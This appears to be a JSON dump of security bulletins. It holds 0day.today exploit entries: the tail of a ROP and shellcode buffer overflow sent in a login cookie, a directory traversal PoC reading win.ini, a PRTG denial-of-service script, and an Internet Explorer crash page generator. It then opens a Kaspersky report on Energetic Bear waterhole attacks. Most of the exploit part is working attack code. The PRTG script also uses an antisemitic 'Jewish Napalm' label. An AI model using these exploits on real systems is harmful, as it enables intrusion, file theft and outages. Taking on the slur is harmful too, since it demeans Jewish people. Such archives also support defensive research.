+= \"\\x67\\x59\\x6f\\x6b\\x65\\x4f\\x4b\\x78\\x70\\x6d\\x65\\x39\"\r\nshellcode += \"\\x32\\x50\\x56\\x73\\x58\\x6c\\x66\\x6c\\x55\\x4d\\x6d\\x6d\"\r\nshellcode += \"\\x4d\\x49\\x6f\\x49\\x45\\x65\\x6c\\x45\\x56\\x73\\x4c\\x45\"\r\nshellcode += \"\\x5a\\x6b\\x30\\x6b\\x4b\\x39\\x70\\x53\\x45\\x34\\x45\\x4d\"\r\nshellcode += \"\\x6b\\x42\\x67\\x65\\x43\\x63\\x42\\x70\\x6f\\x50\\x6a\\x37\"\r\nshellcode += \"\\x70\\x66\\x33\\x6b\\x4f\\x69\\x45\\x30\\x63\\x35\\x31\\x72\"\r\nshellcode += \"\\x4c\\x65\\x33\\x76\\x4e\\x75\\x35\\x42\\x58\\x45\\x35\\x67\"\r\nshellcode += \"\\x70\\x41\\x41\"\r\n\r\n# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]\r\nbuffer = '\\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)\r\n\r\n# mona.py VirtualProtect() ROP template with few modifications \r\n\r\n# ESI = ptr to VirtualProtect()\r\nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]\r\n\r\n# EBP = ReturnTo (ptr to jmp esp)\r\nbuffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]\r\n\r\n# EDX = NewProtect (0x40)\r\nbuffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\r\n\r\n# ECX = lpOldProtect (ptr to W address)\r\nbuffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]\r\n\r\n# EBX = dwSize (0x00000501)\r\nbuffer += struct.pack('<L', 0x10015442)\t # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate\r\nbuffer += struct.pack('<L', 0x100231d1)\t # NEG EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x10015442)\t # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]\r\n\r\n# EDI = ROP NOP (RETN)\r\nbuffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]\r\n\r\n# EAX = NOP (0x90909090)\r\nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]\r\nbuffer += struct.pack('<L', 0x90909090) # nop\r\nbuffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]\r\n\r\nbuffer += \"\\x90\" * 50 # nop\r\nbuffer += shellcode # calc.exe\r\nbuffer += \"\\x90\" * 50 # nop\r\n\r\nbuffer += '\\x45' * (1412-(4*88)+128-len(shellcode)-100) \r\nbuffer += '\\x42' * 4 # nSEH filler\r\n\r\n# stack pivot that will land somewhere in buffer of As\r\nbuffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]\r\n\r\nbuffer += '\\x44' * (5000-4059-4-4)\r\n\r\nprint \"[+] Sending %s bytes of evil payload..\" %len(buffer)\r\ntime.sleep(1)\r\n\r\ntry:\r\n\tcookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')\r\n\tdata=dict(frmLogin='',frmUserName='',frmUserPass='',login='')\r\n\trequests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)\r\nexcept:\r\n\tprint \"The server stopped responding. You should see calc.exe by now ;D\"\n\n# 0day.today [2018-04-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30243"}, {"lastseen": "2018-04-23T20:02:35", "references": [], "description": "Exploit for windows platform in category web applications", "edition": 1, "reporter": "Javier Bernardo", "published": "2018-04-23T00:00:00", "title": "Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10201"], "modified": "2018-04-23T00:00:00", "id": "1337DAY-ID-30225", "href": "https://0day.today/exploit/description/30225", "sourceData": "# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability\r\n# Software Vendor: NComputing\r\n# Software Link: \r\n# Author: Javier Bernardo\r\n# CVE: CVE-2018-10201\r\n# Category: Webapps\r\n \r\n#[Description]\r\n#\r\n#It is possible to read arbitrary files outside the root directory of\r\n#the web server. This vulnerability could be exploited remotely by a\r\n#crafted URL without credentials, with \u2026/ or \u2026\\ or \u2026./ or \u2026.\\ as a\r\n#directory-traversal pattern to TCP port 8667.\r\n#\r\n#An attacker can make use of this vulnerability to step out of the root\r\n#directory and access other parts of the file system. This might give\r\n#the attacker the ability to view restricted files, which could provide\r\n#the attacker with more information required to further compromise the system.\r\n \r\n#[PoC]\r\n \r\nnmap -p T:8667 -Pn your_vSpace_server\r\n \r\nNmap scan report for your_vSpace_server (x.x.x.x)\r\nHost is up (0.044s latency).\r\n \r\nPORT STATE SERVICE\r\n8667/tcp open unknown\r\n \r\nhttp://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini\r\n \r\nhttp://your_vSpace_server:8667/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini\r\n \r\nhttp://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini\r\n \r\nhttp://your_vSpace_server:8667/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini\n\n# 0day.today [2018-04-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30225"}, {"lastseen": "2018-04-23T20:02:40", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "luriel", "published": "2018-04-23T00:00:00", "title": "PRTG Network Monitor < 18.1.39.1648 - Stack Overflow Denial of Service Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10253"], "modified": "2018-04-23T00:00:00", "id": "1337DAY-ID-30229", "href": "https://0day.today/exploit/description/30229", "sourceData": "# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow\r\n# Exploit Author: Lucas \"luriel\" Carmo\r\n# Vendor Homepage: https://www.paessler.com/prtg\r\n# Software Link: https://www.paessler.com/download/prtg-download\r\n# Version: 18.1.39.1648\r\n# CVE : CVE-2018-10253\r\n# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5\r\n# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/\r\n \r\n#!/usr/bin/python\r\n \r\nimport requests\r\nimport sys\r\nimport os\r\nimport re\r\nimport socket\r\n \r\ngreen = \"\\033[1;32m\"\r\nyellow = '\\033[1;33m'\r\nnormal = '\\033[0;0m'\r\nbanner = \"\"\"\r\n \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557\r\n \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\r\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551 \u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\r\n\u2588\u2588 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\r\n\u255a\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2554\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\r\n \u255a\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u255d\u255a\u2550\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\r\n\"\"\"\r\n \r\n \r\nbanner2 = \"\"\"\r\n Author: @Lucas \"luriel\" Carmo\r\n\"\"\"\r\n \r\nos.system('clear')\r\n \r\nprint(green+banner)\r\nprint(yellow+banner2)\r\nprint(normal)\r\n \r\ndef check_http(url):\r\n pattern = re.compile(\"http://\")\r\n return re.search(pattern, url)\r\n \r\ndef sanitize_url(url):\r\n if(not check_http(url)):\r\n return \"http://\" + url\r\n return url\r\n \r\ndef check_server(url):\r\n r = requests.get(url, timeout=4)\r\n code = r.status_code\r\n \r\ndef send_jewish_payload(url):\r\n payload = {'file':'addmap.htm'}\r\n r = requests.post(url, params=payload)\r\n \r\ndef main():\r\n try:\r\n if len(sys.argv) <= 3 and len (sys.argv) >= 2:\r\n try:\r\n url = sanitize_url(sys.argv[1])\r\n print(' [#] LOADING!')\r\n if (check_server(url) != 404):\r\n send_jewish_payload(url)\r\n else:\r\n print(' [!] Server shutdown or not found')\r\n except requests.exceptions.ConnectionError:\r\n print(' [~] BOOOOOM! PRTG Server has been exploded!')\r\n except requests.exceptions.InvalidURL:\r\n print(' [!] Invalid URL')\r\n except requests.exceptions.Timeout:\r\n print(' [!] Connection Timeout\\n')\r\n else:\r\n print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')\r\n except KeyboardInterrupt:\r\n print(' [!] Jewish Napalm Canceled;.....[./]')\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-04-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30229"}, {"lastseen": "2018-04-22T22:06:22", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "hyp3rlinx", "published": "2018-04-22T00:00:00", "title": "Microsoft Internet Explorer 11.371.16299.0 Denial Of Service Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-22T00:00:00", "id": "1337DAY-ID-30219", "href": "https://0day.today/exploit/description/30219", "sourceData": "[+] Credits: John Page (aka hyp3rlinx) \r\n\r\nVendor:\r\n=======\r\nwww.microsoft.com\r\n\r\n\r\nProduct:\r\n========\r\nInternet Explorer (Windows 10)\r\nv11.371.16299.0\r\n\r\nInternet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.\r\n\r\n\r\nVulnerability Type:\r\n==================\r\nDenial Of Service\r\n\r\n\r\nCVE Reference:\r\n==============\r\nN/A\r\n\r\n\r\nSecurity Issue:\r\n================\r\nA null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted\r\nHTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself,\r\nif that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the\r\ncrash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser.\r\n\r\nReferencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)\r\n\r\nTested Windows 10 \r\n\r\nStack Dump:\r\n==========\r\n(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)\r\nntdll!NtWaitForMultipleObjects+0x14:\r\n00007ffa`be5f0e14 c3 ret\r\n0:015> r\r\nrax=000000000000005b rbx=0000000000000003 rcx=0000000000000003\r\nrdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003\r\nrip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000\r\n r8=0000000000000000 r9=0000000000000000 r10=0000000000000000\r\nr11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\r\nntdll!NtWaitForMultipleObjects+0x14:\r\n00007ffa`be5f0e14 c3 ret\r\n\r\nCONTEXT: (.ecxr)\r\nrax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000\r\nrdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000\r\nrip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600\r\n r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398\r\nr11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060\r\nr14=0000000000000002 r15=0000000000000001\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nKERNELBASE!StrCmpICW+0x6:\r\n00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=????\r\nResetting default scope\r\n\r\nFAULTING_IP: \r\nKERNELBASE!StrCmpICW+6\r\n00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]\r\n\r\nEXCEPTION_RECORD: (.exr -1)\r\nExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)\r\n ExceptionCode: c0000005 (Access violation)\r\n ExceptionFlags: 00000000\r\nNumberParameters: 2\r\n Parameter[0]: 0000000000000000\r\n Parameter[1]: 0000000000000000\r\nAttempt to read from address 0000000000000000\r\n\r\nDEFAULT_BUCKET_ID: NULL_POINTER_READ\r\nPROCESS_NAME: iexplore.exe\r\n\r\n\r\n\r\nPOC video URL:\r\n==============\r\nhttps://vimeo.com/265691256/\r\n\r\n\r\n\r\nExploit/POC:\r\n============\r\n1) Run below python script to create \"IE-Win10-Crasha.html\"\r\n2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10\r\n\r\npayload=('<br>\\n'+\r\n'<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\\n'+\r\n'<a href=\".cmd:\" id=\"hate\">crashy ware shee</a>\\n'+\r\n'<br>\\n'+\r\n'Tested successfully on Windows 10\\n'+\r\n'</center><script>\\n'\r\n'function doit(){\\n'+\r\n'document.getElementById(\"hate\").click();\\n'\r\n'alert(\"DOH!\");\\n'+\r\n'obj.click();\\n'+\r\n'obj.click();\\n'+\r\n'}\\n'+\r\n'setInterval(\"doit()\", 2000)\\n'+\r\n'</script>')\r\n\r\nfile=open(\"IE-Win10-Crasha.html\",\"w\")\r\nfile.write(payload)\r\nfile.close()\r\n\r\nprint 'MS InternetExplorer (Win 10) '\r\nprint 'Denial Of Service File Created.'\r\nprint 'hyp3rlinx'\r\n\r\n\r\n\r\n\r\nNetwork Access:\r\n===============\r\nRemote\r\n\r\n\r\n\r\nSeverity:\r\n=========\r\nMedium\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n=============================\r\nVendor Notification: April 18, 2018\r\nvendor closes thread : April 19, 2018\r\nApril 20, 2018 : Public Disclosure\n\n# 0day.today [2018-04-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30219"}], "securelist": [{"lastseen": "2018-04-25T18:41:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "\n\n[_Energetic Bear/Crouching Yeti_](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080817/EB-YetiJuly2014-Public.pdf>)_ is a widely known APT group active since at least 2010. The group tends to attack different companies with a strong focus on the energy and industrial sectors. Companies attacked by Energetic Bear/Crouching Yeti are geographically distributed worldwide with a more obvious concentration in Europe and the US. In 2016-2017, the number of attacks on companies in Turkey increased significantly. _\n\n_The main tactics of the group include sending phishing emails with malicious documents and infecting various servers. The group uses some of the infected servers for auxiliary purposes \u2013 to host tools and logs. Others are deliberately infected to use them in waterhole attacks in order to reach the group's main targets. _\n\n_Recent activity of the group against US organizations was discussed in a _[_US-CERT_](<https://www.us-cert.gov/ncas/alerts/TA18-074A>)_ advisory, which linked the actor to the Russian government, as well as an advisory by the _[_UK National Cyber Security Centre_](<https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control>)_. _\n\n_This report by _[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_ presents information on identified servers that have been infected and used by the group. The report also includes the findings of an analysis of several webservers compromised by the Energetic Bear group during 2016 and in early 2017_.\n\n## Attack victims\n\nThe table below shows the distribution of compromised servers (based on the language of website content and/or the origins of the company renting the server at the time of compromise) by countries, attacked company types and the role of each server in the overall attack scheme. Victims of the threat actor's attacks were not limited to industrial companies.\n\n**Table 1. Compromised servers**\n\n**Country** | **Description** | **Role in the attack** \n---|---|--- \n**Russia** | Opposition political website | Waterhole \nReal estate agency | Auxiliary (collecting user data in the waterhole attack) \nFootball club | Waterhole \nDeveloper and integrator of secure automation systems and IS consultant | Waterhole \nDevelopers of software and equipment | Auxiliary (collecting user data in the waterhole attack, tool hosting) \nInvestment website | Auxiliary (collecting user data in the waterhole attack) \n**Ukraine** | Electric power sector company | Waterhole \nBank | Waterhole \n**UK** | Aerospace company | Waterhole \n**Germany** | Software developer and integrator | Waterhole \nUnknown | Auxiliary (collecting user data in the waterhole attack) \n**Turkey** | Oil and gas sector enterprise | Waterhole \nIndustrial group | Waterhole \nInvestment group | Waterhole \n**Greece** | Server of a university | Auxiliary (collecting user data in the waterhole attack) \n**USA** | Oil and gas sector enterprise | Waterhole \n**Unknown** | Affiliate network site | Auxiliary (collecting user data in the waterhole attack) \n \n## Waterhole\n\nAll waterhole servers are infected following the same pattern: injecting a link into a web page or JS file with the following file scheme: file://IP/filename.png.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-1.png>)\n\n_Injected link with the file scheme_\n\nThe link is used to initiate a request for an image, as a result of which the user connects to the remote server over the SMB protocol. In this attack type, the attackers' goal is to extract the following data from the session:\n\n * user IP,\n * user name,\n * domain name,\n * NTLM hash of the user's password.\n\nIt should be noted that the image requested using the link is not physically located on the remote server.\n\n## Scanned resources\n\nCompromised servers are in some cases used to conduct attacks on other resources. In the process of analyzing infected servers, numerous websites and servers were identified that the attackers had scanned with various tools, such as nmap, dirsearch, sqlmap, etc. (tool descriptions are provided below).\n\n**Table 2. Resources that were scanned from one of the infected servers**\n\n**Country \n(based on the content)** | **Description** \n---|--- \n**Russia** | Non-profit organization \nSale of drugs \nTravel/maps \nResources based on the Bump platform (platform for corporate social networks) \u2013 